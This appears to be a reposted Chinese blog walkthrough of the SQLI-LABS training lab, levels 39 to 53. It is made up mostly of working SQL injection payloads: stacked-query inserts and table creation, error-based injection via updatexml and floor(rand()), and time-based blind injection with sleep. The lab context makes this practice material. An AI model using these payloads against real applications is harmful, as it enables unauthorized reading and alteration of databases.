SQLI-LABS 靶场通过小记(39~53)

Posted 曹振国cc

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQLI-LABS 靶场通过小记(39~53)相关的知识,希望对你有一定的参考价值。

Less-39:

通过在传参id后加入反斜杠,发现不需要进行闭合

image-20210714185616562

1.堆叠注入
?id=1 and 1=2 union select 1,database(),3 -- qwe

image-20210714185757312

2.也可以创建表
?id=1;create table test39 like users -- qwe

image-20210714190336208

image-20210714190413833

Less-40:

单引号括号')闭合

Less0-41:

无需闭合,同39题

Less-42:

1.在users表里添加一个新用户的数据
?id=-1'; insert into users(id,username,password) values(29,'cao','cao') %23

image-20210714193342663

image-20210714193408671

登录成功

image-20210714193549677

Less-43:

同42题,只需要单引号括号')闭合即可

Less-44:

同42题,只是没有回显

1.更新数据,堆叠注入
1'; insert into users(id,username,password) values(22,'cccc','cao') %23

image-20210714195702533

image-20210714195727621

Less-45:

单引号括号')闭合

Less-46:

1.正常查询

2.报错注入
sort=updatexml(1,if(1=1,concat(0x7e,database(),2),1)

image-20210714201647735

Less-47:

单引号闭合

1.报错注入
?sort=1'and (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))) -- qwe

image-20210714202627124

Less-48:

1.时间盲注
sort=1 and If(ascii(substr(database(),1,1))=115,sleep (3),NULL) -- qwe

image-20210714203210201

Less-49:

单引号闭合

?sort=1' and If(ascii(substr(database(),1,1))=115,sleep (3),NULL) -- qwe

Less-50:

1.堆叠注入
?sort=1; insert into users(id,username,password) values(25,'ccb','cao') %23

image-20210714204128565

Less-51:

同50题,单引号闭合

?sort=1'; insert into users(id,username,password) values(13,'ccg','cao') %23

Less-52:

和第50题相同

?sort=1; insert into users(id,username,password) values(15,'ccg','cao') %23

Less-53:

与第51题相同

?sort=1'; insert into users(id,username,password) values(16,'cad','cao') %23

以上是关于SQLI-LABS 靶场通过小记(39~53)的主要内容,如果未能解决你的问题,请参考以下文章

SQLI-LABS 靶场通过小记(39~53)

SQLI-LABS 靶场通过小记(54~65)

SQLI-LABS 靶场通过小记(54~65)

SQLI-LABS 靶场通过小记(54~65)

SQLI-LABS 靶场通过小记(23~38)

SQLI-LABS 靶场通过小记(23~38)